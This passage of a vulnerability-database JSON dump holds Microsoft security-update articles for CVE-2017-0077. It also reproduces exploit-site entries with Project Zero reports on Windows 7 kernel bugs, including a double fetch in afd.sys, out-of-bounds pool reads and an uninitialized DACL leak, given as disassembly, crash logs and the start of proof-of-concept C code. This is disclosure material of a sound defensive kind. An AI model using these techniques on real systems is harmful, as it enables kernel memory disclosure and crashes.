No new operating system features are being introduced in this update. Key changes include:\n\n * Updated Windows Cryptography API to deprecate SHA-1 for SSL/TLS Server Authentication, including in Microsoft Edge and Internet Explorer 11. See [Advisory 4010323](<https://support.microsoft.com/help/4010323>) for more information.\n * Security updates to Microsoft Graphics Component, Microsoft Windows DNS, Windows COM, Windows Server and Windows kernel.\nFor more information about the security vulnerabilities resolved, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## Known issues in this update\n\nThis security update introduced an issue in which, if an iSCSI target becomes unavailable, attempts to reconnect will cause a leak. Initiating a new connection to an available target will work as expected. Microsoft is researching this problem and will post more information in this article when the information becomes available. \nFor more information about this issue, see the following section.\n\n## \n\n__\n\nMore information about the iSCSI issue\n\nWindows Server 2012 R2 and Server 2016 computers that experience disconnections to iSCSI attached targets may show many different symptoms. These include, but are not limited to:\n\n * The operating system stops responding\n * You receive Stop errors (Bugcheck errors) 0x80, 0x111, 0x1C8, 0xE2, 0x161, 0x00, 0xF4, 0xEF, 0xEA, 0x101, 0x133, or 0xDEADDEAD.\n * User log on failures occur together with a \"No Logon Servers Available\" error.\n * Application and service failures occur because of ephemeral port exhaustion.\n * An unusually high number of ephemeral ports are being used by the System process.\n * An unusually high number of threads are being used by the System process.\n**Cause** \n \nThis issue is caused by a locking issue on Windows Server 2012 R2 and Windows Server 2016 RS1 computers, causing connectivity issues to the iSCSI targets. 
The issue can occur after installing any of the following updates:**Windows Server 2012 R2**Release date| KB| Article title \n---|---|--- \nMay 16, 2017| KB [4015553](<https://support.microsoft.com/en-us/help/4015553>)| April 18, 2017\u2014KB4015553 (Preview of Monthly Rollup) \nMay 9, 2017| KB [4019215](<https://support.microsoft.com/en-us/help/4019215>)| May 9, 2017\u2014KB4019215 (Monthly Rollup) \nMay 9, 2017| KB [4019213](<https://support.microsoft.com/en-us/help/4019213>)| May 9, 2017\u2014KB4019213 (Security-only update) \nApril 18, 2017| KB [4015553](<https://support.microsoft.com/en-us/help/4015553>)| April 18, 2017\u2014KB4015553 (Preview of Monthly Rollup) \nApril 11, 2017| KB [4015550](<https://support.microsoft.com/en-us/help/4015550>)| April 11, 2017\u2014KB4015550 (Monthly Rollup) \nApril 11, 2017| KB [4015547](<https://support.microsoft.com/en-us/help/4015547>)| April 11, 2017\u2014KB4015547 (Security-only update) \nMarch 21, 2017| KB [4012219](<https://support.microsoft.com/en-us/help/4012219>)| March 2017 Preview of Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2 \n**Windows Server 2016 RTM (RS1) **Release date| KB| Article title \n---|---|--- \nMay 16, 2017| KB [4023680](<https://support.microsoft.com/en-us/help/4023680>)| May 26, 2017\u2014KB4023680 (OS Build 14393.1230) \nMay 9, 2017| KB [4019472](<https://support.microsoft.com/en-us/help/4019472>)| May 9, 2017\u2014KB4019472 (OS Build 14393.1198) \nApril 11, 2017| KB [4015217](<https://support.microsoft.com/en-us/help/4015217>)| April 11, 2017\u2014KB4015217 (OS Build 14393.1066 and 14393.1083) \n \n**Verification**\n\n * Verify the version of the following MSISCSI driver on the system: \n \nc:\\windows\\system32\\drivers\\msiscsi.sys \n \nThe version that will expose this behavior is 6.3.9600.18624 for Windows Server 2012 R2 and version 10.0.14393.1066 for Windows Server 2016.\n * The following events are logged in the System log:Event source| ID| Text \n---|---|--- 
\niScsiPrt| 34| A connection to the target was lost, but the Initiator successfully reconnected to the target. Dump data contains the target name. \niScsiPrt| 39| The Initiator sent a task management command to reset the target. The target name is given in the dump data. \niScsiPrt| 9| Target did not respond in time for a SCSI request. The CDB is given in the dump data. \n * Review the number of threads that are running under the System process, and compare this to a known working baseline.\n * Review the number of handles that are currently opened by the System process, and compare this to a known working baseline.\n * Review the number of ephemeral ports that are being used by the System process.\n * From an administrative Powershell, run the following command: \n \n**Get-NetTCPConnection | Group-Object -Property State, OwningProcess | Sort Count** \n \nOr, from an administrative CMD prompt, run the following NETSTAT command together with the \"Q\" switch. This shows \"bound\" ports that are no longer connected: \n \n**NETSTAT \u2013ANOQ ** \n \nFocus on ports that are owned by the SYSTEM process. \n \nFor the three previous points, anything more than 12,000 should be considered suspect. If iSCSI targets are present in the computer, there is high probability that the issue will occur.\n**Resolution** \n \nIf the event logs indicate that many reconnections are occurring, work with your iSCSI and network fabric vendor to help diagnose and correct the reason for the failure to maintain connections to iSCSI targets. Make sure that iSCSI targets can be accessed over the current network fabric. Install updated fixes when they become available. This article will be updated with the specific KB article number of the fix to install when it becomes available. \n \n**Note** We do not recommend that you uninstall any of the March, April, May, or June security rollups. 
Doing so will expose the computers to known security exploits and other bugs that are mitigated by monthly updates. We recommend that you first work with iSCSI target and network vendors to resolve the connectivity issues that are triggering target reconnects.\n\nHow to get this updateThis update will be downloaded and installed automatically from Windows Update. To get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4019213>) website.\n\n * **Prerequisites** \nTo apply this update, you must have Windows 8.1 and Windows Server 2012 R2 update: April 2014 (KB2919355) installed.\n * **File information** \nFor a list of the files that are provided in this update, download the [file information for cumulative update KB4019213](<http://download.microsoft.com/download/B/F/E/BFE0248F-716F-4CEF-8312-6AA0B5D69DE5/4019213.csv>).\nMore Information\n * This security-only quality update does not include security fixes for Internet Explorer. In order to obtain the security fixes for Internet Explorer, the Cumulative Security Update for Internet Explorer KB4018271 should also be installed. Note that the Security Monthly Quality Rollup does contain security updates for Internet Explorer.\n * If you use update management processes other than Windows Update and you automatically approve all security updates classifications for deployment, the May 2017 Security-Only Quality Update KB4019213, May 2017 Security Monthly Quality Rollup KB4019215, and the Cumulative Security Update for Internet Explorer KB4018271 are deployed. 
We recommend that you review your update deployment rules to make sure the desired updates are deployed.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "May 9, 2017\u2014KB4019213 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019213", "href": "https://support.microsoft.com/en-us/help/4019213", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T13:21:25", "description": "None\n## Summary\n\nAn elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver handles objects in memory incorrectly. An attacker who successfully exploits the vulnerability could obtain information to further compromise the user\u2019s system. On computers that have 64-bit Windows 7 or later systems installed, this vulnerability can lead to a denial of service. 
\n \nTo learn more about the vulnerability, go to [CVE-2017-0077](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2017-0077>).\n\n## More Information\n\nImportant \n\n\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/en-us/library/hh825699>).\n\n## How to obtain and install the update \n\n### Method 1: Windows Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Get security updates automatically](<https://www.microsoft.com/en-us/safety/pc-security/updates.aspx>). \n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://catalog.update.microsoft.com/v7/site/search.aspx?q=4019149>) website. 
\n\n\n## Deployment information\n\nFor deployment details for this security update, go to the following article in the Microsoft Knowledge Base: \n[Security update deployment information: May 9, 2017](<http://support.microsoft.com/en-us/help/20170509>)\n\n## More Information\n\n## \n\n__\n\nHow to obtain help and support for this security update\n\nHelp for installing updates: [Windows Update FAQ](<http://support.microsoft.com/ph/6527>) \n \nSecurity solutions for IT professionals: [TechNet Security Support and Troubleshooting](<https://technet.microsoft.com/security/bb980617.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Secure](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>) \n\n\nFile Information\n\n## \n\n__\n\nFile hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nWindows6.0-KB4019149-ia64.msu| 7809D37527DAA1B986B134D2068CC2C88A3A5803| B6F7F80BC80BA191CDDC42E9C3A738067CDB1F83D03F236D0CEC6AB00C8FCCB0 \nWindows6.0-KB4019149-x64.msu| 39AE9056E4D6CDD7AEAC4C6224E4062C8F7DEBEC| A3E055FEE19A4DC7EB3B9CF25E216004B5C710AFE9BBAD34F93BE30DA872319C \nWindows6.0-KB4019149-x86.msu| 4D038001037EF245542CF1A7EA51654BE9ED8BB8| 61EA0FE4CCA0BD69D8893C5A3ACD627F9EDF6E21F9AC94A02E2B6BE4BD45D2EC \n \n \n**File information** \nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables. 
\n \n**Windows Server 2008 file information** \n\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n## \n\n__\n\nFor all supported ia64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18823| 105,984| 13-Apr-2013| 03:48| IA-64 \nDxgkrnl.sys| 7.0.6002.19765| 2,008,808| 07-Apr-2017| 15:58| IA-64 \nCdd.dll| 7.0.6002.24089| 105,984| 07-Apr-2017| 15:16| IA-64 \nDxgkrnl.sys| 7.0.6002.24089| 2,008,808| 07-Apr-2017| 15:44| IA-64 \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18392| 47,104| 20-Jan-2011| 16:12| x64 \nDxgkrnl.sys| 7.0.6002.19765| 901,352| 07-Apr-2017| 16:25| x64 \nCdd.dll| 7.0.6002.24089| 47,104| 07-Apr-2017| 15:42| x64 \nDxgkrnl.sys| 7.0.6002.24089| 901,352| 07-Apr-2017| 15:50| x64 \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nCdd.dll| 7.0.6002.18392| 37,376| 20-Jan-2011| 16:02| x86 \nDxgkrnl.sys| 7.0.6002.19765| 638,184| 07-Apr-2017| 16:08| x86 \nCdd.dll| 7.0.6002.24089| 37,376| 07-Apr-2017| 15:22| x86 \nDxgkrnl.sys| 7.0.6002.24089| 638,184| 07-Apr-2017| 15:30| x86\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-09T07:00:00", "type": "mskb", "title": "Security update for the Dxgkrnl.sys Elevation of Privilege Vulnerability in Windows Server 2008: May 9, 2017", 
"bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0077"], "modified": "2017-05-09T07:00:00", "id": "KB4019149", "href": "https://support.microsoft.com/en-us/help/4019149", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-16T09:10:03", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0220", "CVE-2017-0175"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27774", "href": "https://0day.today/exploit/description/27774", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1127\r\n \r\nWe have identified two related bugs in Windows kernel code responsible for implementing the bind() socket function, specifically in the afd!AfdBind and tcpip!TcpBindEndpoint routines. They both can lead to reading beyond the allocated pool-based buffer memory area, potentially allowing user-mode applications to disclose kernel-mode secrets. 
They can also be exploited to trigger a blue screen of death and therefore a Denial of Service condition.\r\n \r\nThe details are explained below.\r\n \r\n----------[ Double-fetch in afd!AfdBind ]----------\r\n \r\nIn the code of the afd!AfdBind function of the up-to-date afd.sys module (handler of the AFD_BIND IOCTL accessible from ring-3) on Windows 7 32-bit, we can find the following assembly code construct:\r\n \r\n--- cut ---\r\n PAGE:00024D71 push 0EC646641h ; Tag\r\n PAGE:00024D76 push [ebp+NumberOfBytes] ; NumberOfBytes\r\n PAGE:00024D79 push 10h ; PoolType\r\n PAGE:00024D7B call ds:[email\u00a0protected]\r\n [...]\r\n PAGE:00024DD2 lea edi, [eax+4]\r\n PAGE:00024DD5 push edi ; void *\r\n PAGE:00024DD6 push [ebp+P] ; void *\r\n PAGE:00024DD9 call ds:__imp__memmove <------------------- Fetch #1\r\n PAGE:00024DDF add esp, 0Ch\r\n PAGE:00024DE2 movzx eax, word ptr [edi] <----------------- Fetch #2\r\n PAGE:00024DE5 cmp ax, 22h\r\n PAGE:00024DE9 jb short loc_24E01\r\n [...]\r\n PAGE:00024E01\r\n PAGE:00024E01 loc_24E01:\r\n PAGE:00024E01 push eax\r\n PAGE:00024E02 call [email\u00a0protected] ; SOCKADDR_SIZE(x)\r\n PAGE:00024E07 movzx eax, al\r\n PAGE:00024E0A cmp [ebp+NumberOfBytes], eax\r\n PAGE:00024E0D jnb short loc_24E25\r\n--- cut ---\r\n \r\nWhich translates to the following pseudo-code:\r\n \r\n--- cut ---\r\n LPINPUTSTRUCT lpKernelStruct = ExAllocatePool(NumberOfBytes);\r\n memmove(lpKernelStruct, lpUserStruct, NumberOfBytes); <-------------------- Fetch #1\r\n \r\n if (NumberOfBytes < SOCKADDR_SIZE(lpUserStruct->dwStructType)) { <--------- Fetch #2\r\n // Bail out.\r\n }\r\n--- cut ---\r\n \r\nAs can be seen, the first WORD of the input structure is fetched twice from a user-mode buffer: once during the memmove() call, and once when directly accessing it to pass its value as an argument to the SOCKADDR_SIZE function. 
The SOCKADDR_SIZE function is mostly just a wrapper around the constant sockaddr_size[] array, which has the following values:\r\n \r\n * indexes 0x00..0x01: 0x00\r\n * index 0x02: 0x10\r\n * indexes 0x03..0x16: 0x00\r\n * index 0x17: 0x1C\r\n * indexes 0x16..0x21: 0x00\r\n \r\nThe double fetch makes it possible for the first WORD of the structure to have different values on each access from kernel-mode (through another thread concurrently flipping its bits). For example, it could have the valid value 2 or 0x17 at the time of the memmove(), but any other value at the time of the direct access. This would lead to comparing the input structure size with 0 (which is the corresponding entry in sockaddr_size[]), effectively nullifying the sanitization. Other code down the execution flow may then assume that the size of the buffer has been correctly verified, and access some fields at predefined offsets, which may be located outside of the allocated buffer, if the user specifies a very small size.\r\n \r\nIn our case, the confused code is in tcpip!TcpBindEndpoint, which tries to copy an excessive number of bytes from a very small allocation. 
A crash log excerpt is shown below:\r\n \r\n--- cut ---\r\n DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)\r\n N bytes of memory was allocated and more than N bytes are being referenced.\r\n This cannot be protected by try-except.\r\n When possible, the guilty driver's name (Unicode string) is printed on\r\n the bugcheck screen and saved in KiBugCheckDriver.\r\n Arguments:\r\n Arg1: 8c5ed000, memory referenced\r\n Arg2: 00000000, value 0 = read operation, 1 = write operation\r\n Arg3: 84c703fe, if non-zero, the address which referenced memory.\r\n Arg4: 00000000, (reserved)\r\n \r\n Debugging Details:\r\n ------------------\r\n \r\n [...]\r\n \r\n TRAP_FRAME: 96647818 -- (.trap 0xffffffff96647818)\r\n ErrCode = 00000000\r\n eax=9512d970 ebx=95051020 ecx=00000003 edx=00000000 esi=8c5ed000 edi=9505104c\r\n eip=84c703fe esp=9664788c ebp=96647898 iopl=0 nv up ei ng nz ac po cy\r\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010293\r\n tcpip!TcpBindEndpoint+0x51:\r\n 84c703fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n Resetting default scope\r\n \r\n LAST_CONTROL_TRANSFER: from 81722dff to 816be9d8\r\n \r\n STACK_TEXT: \r\n 9664736c 81722dff 00000003 d1dfd5f3 00000065 nt!RtlpBreakWithStatusInstruction\r\n 966473bc 817238fd 00000003 00000000 00000004 nt!KiBugCheckDebugBreak+0x1c\r\n 96647780 816d199d 00000050 8c5ed000 00000000 nt!KeBugCheck2+0x68b\r\n 96647800 81683f98 00000000 8c5ed000 00000000 nt!MmAccessFault+0x104\r\n 96647800 84c703fe 00000000 8c5ed000 00000000 nt!KiTrap0E+0xdc\r\n 96647898 84c7039e 951769a0 8c2e3896 9512d970 tcpip!TcpBindEndpoint+0x51\r\n 966478b8 84c72900 951769a0 966479cc 00000000 tcpip!TcpIoControlEndpoint+0x199\r\n 966478cc 816ccbe5 9664795c d1dfdf7b 00000000 tcpip!TcpTlEndpointIoControlEndpointCalloutRoutine+0x8b\r\n 96647934 84c6d89e 84c72875 9664795c 00000000 nt!KeExpandKernelStackAndCalloutEx+0x132\r\n 9664796c 8c2e05ed 95176900 96647901 966479f8 tcpip!TcpTlEndpointIoControlEndpoint+0x67\r\n 966479a0 8c2e06aa 84c6d837 
951769a0 966479cc afd!AfdTLIoControl+0x33\r\n 966479b8 8c2e3afa 8c53eef0 966479cc 9512d970 afd!AfdTLEndpointIoControl+0x1a\r\n 966479f8 8c2e388a 9512d970 8c53eef0 9512d970 afd!AfdTLBind+0x4b\r\n 96647a40 8c2d3eb8 9512d970 8c53eef0 00000000 afd!AfdTLBindSecurity+0x108\r\n 96647aac 8c2e02bc 85e81198 9512d970 96647ae0 afd!AfdBind+0x283\r\n 96647abc 8197d4d9 8bc0edd0 9512d970 85e81198 afd!AfdDispatchDeviceControl+0x3b\r\n 96647ae0 8167a0e0 818727af 9512d970 8bc0edd0 nt!IovCallDriver+0x73\r\n 96647af4 818727af 00000000 9512d970 9512da4c nt!IofCallDriver+0x1b\r\n 96647b14 81875afe 8bc0edd0 85e81198 00000000 nt!IopSynchronousServiceTail+0x1f8\r\n 96647bd0 818bcab0 00000054 9512d970 00000000 nt!IopXxxControlFile+0x810\r\n 96647c04 81680db6 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n 96647c04 77716c74 00000054 00000000 00000000 nt!KiSystemServicePostCall\r\n 0034f8b8 7771542c 75acab4d 00000054 00000000 ntdll!KiFastSystemCallRet\r\n 0034f8bc 75acab4d 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc\r\n 0034f91c 7712bb75 00000054 00012003 001530d0 KERNELBASE!DeviceIoControl+0xf6\r\n 0034f948 00141141 00000054 00012003 001530d0 kernel32!DeviceIoControlImplementation+0x80\r\n [...]\r\n--- cut ---\r\n \r\nWe suspect it should be possible to extract some of the junk pool memory back to user-mode, e.g. through the IP address and port assigned to the socket in question. The issue reproduces on Windows 7, and is easiest to observe with Special Pools enabled for the afd.sys module. Attached is a afdbind_doublefetch.cpp file which is the C++ source code of a proof-of-concept program for the issue.\r\n \r\n----------[ Buffer size sanitization logic in afd!AfdBind and tcpip!TcpBindEndpoint ]----------\r\n \r\nAs discussed before, the sockaddr_size[] array used during input structure size sanitization is full of 0x00's, except for indexes 0x2 and 0x17 (which are probably the only two valid packet types). 
Thus, if we call an IOCTL with the WORD containing a value other than the two, the sanitization will be virtually non-existent, and the input buffer is allowed to have any size at all. However, if we take a look at the tcpip!TcpBindEndpoint routine, we can see the following logic:\r\n \r\n--- cut ---\r\n .text:000533EC cmp word ptr [esi], 2\r\n .text:000533F0 lea edi, [ebx+1Ch]\r\n .text:000533F3 jnz short loc_533FB\r\n .text:000533F5 movsd\r\n .text:000533F6 movsd\r\n .text:000533F7 movsd\r\n .text:000533F8 movsd\r\n .text:000533F9 jmp short loc_53400\r\n .text:000533FB\r\n .text:000533FB loc_533FB:\r\n .text:000533FB push 7\r\n .text:000533FD pop ecx\r\n .text:000533FE rep movsd\r\n--- cut ---\r\n \r\nwhich translates to:\r\n \r\n--- cut ---\r\n if (lpKernelStruct->dwStructType == 2) {\r\n memcpy(lpNewStruct, lpKernelStruct, 0x10);\r\n } else {\r\n memcpy(lpNewStruct, lpKernelStruct, 0x1C);\r\n }\r\n--- cut ---\r\n \r\nIn other words, if the first WORD doesn't equal 2, the function assumes that it must equal 0x17 and thus the buffer must have been verified to be at least 0x1C bytes long. However, as the dwStructType value and buffer size may be arbitrary, an out-of-bounds read of at most ~0x1C bytes may occur in the memcpy() call. 
An excerpt from a subsequent crash is shown below (very similar to the previous one):\r\n \r\n--- cut ---\r\n DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)\r\n N bytes of memory was allocated and more than N bytes are being referenced.\r\n This cannot be protected by try-except.\r\n When possible, the guilty driver's name (Unicode string) is printed on\r\n the bugcheck screen and saved in KiBugCheckDriver.\r\n Arguments:\r\n Arg1: 8b523000, memory referenced\r\n Arg2: 00000000, value 0 = read operation, 1 = write operation\r\n Arg3: 84e793fe, if non-zero, the address which referenced memory.\r\n Arg4: 00000000, (reserved)\r\n \r\n Debugging Details:\r\n ------------------\r\n \r\n [...]\r\n \r\n TRAP_FRAME: 88c67818 -- (.trap 0xffffffff88c67818)\r\n ErrCode = 00000000\r\n eax=84492318 ebx=94e30020 ecx=00000003 edx=00000000 esi=8b523000 edi=94e3004c\r\n eip=84e793fe esp=88c6788c ebp=88c67898 iopl=0 nv up ei ng nz ac po cy\r\n cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010293\r\n tcpip!TcpBindEndpoint+0x51:\r\n 84e793fe f3a5 rep movs dword ptr es:[edi],dword ptr [esi]\r\n Resetting default scope\r\n \r\n LAST_CONTROL_TRANSFER: from 82730dff to 826cc9d8\r\n \r\n STACK_TEXT: \r\n 88c6736c 82730dff 00000003 fbe6b7bb 00000065 nt!RtlpBreakWithStatusInstruction\r\n 88c673bc 827318fd 00000003 00000000 00000004 nt!KiBugCheckDebugBreak+0x1c\r\n 88c67780 826df99d 00000050 8b523000 00000000 nt!KeBugCheck2+0x68b\r\n 88c67800 82691f98 00000000 8b523000 00000000 nt!MmAccessFault+0x104\r\n 88c67800 84e793fe 00000000 8b523000 00000000 nt!KiTrap0E+0xdc\r\n 88c67898 84e7939e 95464008 8b8ca896 84492318 tcpip!TcpBindEndpoint+0x51\r\n 88c678b8 84e7b900 95464008 88c679cc 00000000 tcpip!TcpIoControlEndpoint+0x199\r\n 88c678cc 826dabe5 88c6795c fbe6bd33 00000000 tcpip!TcpTlEndpointIoControlEndpointCalloutRoutine+0x8b\r\n 88c67934 84e7689e 84e7b875 88c6795c 00000000 nt!KeExpandKernelStackAndCalloutEx+0x132\r\n 88c6796c 8b8c75ed 95464000 88c67901 88c679f8 
tcpip!TcpTlEndpointIoControlEndpoint+0x67\r\n 88c679a0 8b8c76aa 84e76837 95464008 88c679cc afd!AfdTLIoControl+0x33\r\n 88c679b8 8b8caafa 8b54aef0 88c679cc 84492318 afd!AfdTLEndpointIoControl+0x1a\r\n 88c679f8 8b8ca88a 84492318 8b54aef0 84492318 afd!AfdTLBind+0x4b\r\n 88c67a40 8b8baeb8 84492318 8b54aef0 00000000 afd!AfdTLBindSecurity+0x108\r\n 88c67aac 8b8c72bc 95463210 84492318 88c67ae0 afd!AfdBind+0x283\r\n 88c67abc 8298b4d9 86cac1a0 84492318 95463210 afd!AfdDispatchDeviceControl+0x3b\r\n 88c67ae0 826880e0 828807af 84492318 86cac1a0 nt!IovCallDriver+0x73\r\n 88c67af4 828807af 00000000 84492318 844923f4 nt!IofCallDriver+0x1b\r\n 88c67b14 82883afe 86cac1a0 95463210 00000000 nt!IopSynchronousServiceTail+0x1f8\r\n 88c67bd0 828caab0 00000054 84492318 00000000 nt!IopXxxControlFile+0x810\r\n 88c67c04 8268edb6 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a\r\n 88c67c04 775a6c74 00000054 00000000 00000000 nt!KiSystemServicePostCall\r\n 0024faa4 775a542c 7570ab4d 00000054 00000000 ntdll!KiFastSystemCallRet\r\n 0024faa8 7570ab4d 00000054 00000000 00000000 ntdll!NtDeviceIoControlFile+0xc\r\n 0024fb08 75d1bb75 00000054 00012003 0024fc38 KERNELBASE!DeviceIoControl+0xf6\r\n 0024fb34 010b120b 00000054 00012003 0024fc38 kernel32!DeviceIoControlImplementation+0x80\r\n [...]\r\n--- cut ---\r\n \r\nThe issue reproduces on Windows 7, and is easiest to observe with Special Pools enabled for the afd.sys module. 
Attached is an afdbind_tcpip_oob_read.cpp file which is the C++ source code of a proof-of-concept program for the issue.\r\n \r\n \r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42009.zip\n\n# 0day.today [2018-02-16] #", "sourceHref": "https://0day.today/exploit/27774", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-10T07:41:06", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2017-05-16T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0258"], "modified": "2017-05-16T00:00:00", "id": "1337DAY-ID-27776", "href": "https://0day.today/exploit/description/27776", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145\r\n \r\nWe have observed (on Windows 7 32-bit) that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens (lsass.exe, services.exe, ...) has 8 uninitialized bytes at the end, as the size of the structure (ACL.AclSize) is larger than the sum of ACE lengths (ACE_HEADER.AceSize). It is possible to read the leftover pool data using a GetTokenInformation(TokenDefaultDacl) call.\r\n \r\nWhen the attached proof-of-concept code is run against a SYSTEM process (pid of the process must be passed in the program argument), on a system with Special Pools enabled for ntoskrnl.exe, output similar to the following can be observed:\r\n \r\n>NtQueryInformationToken.exe 520\r\n00000000: 54 bf 2b 00 02 00 3c 00 02 00 00 00 00 00 14 00 T.+...<.........\r\n00000010: 00 00 00 10 01 01 00 00 00 00 00 05 12 00 00 00 ................\r\n00000020: 00 00 18 00 00 00 02 a0 01 02 00 00 00 00 00 05 ................\r\n00000030: 20 00 00 00 20 02 00 00[01 01 01 01 01 01 01 01] ... 
...........\r\n \r\nThe last eight 0x01 bytes are markers inserted by Special Pools, which visibly haven't been overwritten by any actual data prior to being returned to user-mode.\r\n \r\nWhile reading DACLs of system processes may require special privileges (such as the ability to acquire SeDebugPrivilege), the root cause of the behavior could potentially make it possible to also create uninitialized DACLs that are easily accessible by regular users. This could in turn lead to a typical kernel memory disclosure condition, which would allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. Since it's not clear to us what causes the aberrant behavior, we're reporting it for further analysis to be on the safe side.\r\n \r\nThe proof-of-concept code is mostly based on the example at https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege.\r\n*/\r\n \r\n#define RTN_OK 0\r\n#define RTN_USAGE 1\r\n#define RTN_ERROR 13\r\n \r\n#include <windows.h>\r\n#include <stdio.h>\r\n \r\nBOOL SetPrivilege(\r\n HANDLE hToken, // token handle\r\n LPCTSTR Privilege, // Privilege to enable/disable\r\n BOOL bEnablePrivilege // TRUE to enable. 
